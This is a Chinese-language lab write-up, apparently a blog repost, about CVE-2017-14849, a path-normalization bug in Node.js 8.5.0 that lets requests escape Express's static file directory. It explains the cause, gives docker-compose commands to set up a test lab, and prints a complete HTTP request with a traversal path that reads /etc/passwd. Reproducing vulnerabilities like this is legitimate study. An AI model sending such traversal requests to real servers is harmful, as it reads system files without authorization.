Node.js 目錄穿越漏洞(CVE-2017-14849)
阿新 • • 發佈:2022-05-17
漏洞原理
參考文件:
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- https://security.tencent.com/index.php/blog/msg/121
原因是 Node.js 8.5.0 對目錄進行normalize
操作時出現了邏輯錯誤,導致向上層跳躍的時候(如../../../../../../etc/passwd
),在中間位置增加foo/../
(如../../../foo/../../../../etc/passwd
),即可使normalize
返回/etc/passwd
,但實際上正確結果應該是../../../../../../etc/passwd
express這類web框架,通常會提供了靜態檔案伺服器的功能,這些功能依賴於normalize
函式。比如,express在判斷path是否超出靜態目錄範圍時,就用到了normalize
函式,上述BUG導致normalize
函式返回錯誤結果導致繞過了檢查,造成任意檔案讀取漏洞。
當然,normalize
的BUG可以影響的絕非僅有express,更有待深入挖掘。不過因為這個BUG是node 8.5.0 中引入的,在 8.6 中就進行了修復,所以影響範圍有限。
漏洞復現
編譯及執行環境:
docker-compose build
docker-compose up -d
訪問http://your-ip:3000/
/static/main.js
,說明其存在靜態檔案伺服器。
傳送如下資料包,即可讀取passwd:
點選檢視程式碼
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close